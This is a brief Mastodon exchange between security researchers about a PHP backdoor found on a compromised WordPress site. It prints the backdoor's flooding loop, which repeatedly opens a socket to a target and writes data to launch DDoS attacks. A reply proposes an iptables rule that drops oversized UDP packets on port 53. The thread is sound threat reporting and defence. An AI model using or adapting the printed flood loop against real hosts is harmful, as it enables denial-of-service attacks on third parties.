**Daniel Cid** @dcid@noc.social · Jul 25, 2022, 21:08

**Daniel Cid** @dcid@noc.social · Jul 25, 2022, 21:08

Daniel Cid @dcid@noc.social

A PHP backdoor on a compromised #WordPress site being used to start #DDoS attacks:

while(true)
{
$fp=fsockopen($trh2,$trp,$aaa1,$aaa2,1);
fwrite($fp,$spdat);
}

**Vinicius Mello** @vmmell0@noc.social · 2022-07-25T23:14:46Z

Vinicius Mello @vmmell0@noc.social

@dcid interesting that port 53 is hardcoded. I vaguely remember using a rule like:

# iptables -A FORWARD -p udp --dport 53 -m length --length 512: -j DROP

(i.e block UDP packets > 512 bytes on port 53)

Jul 25, 2022, 23:14 · · Web · · ·

**Daniel Cid** @dcid@noc.social · Jul 25, 2022, 23:29

**Daniel Cid** @dcid@noc.social · Jul 25, 2022, 23:29

Daniel Cid @dcid@noc.social

@vmmell0 interesting, good idea on that.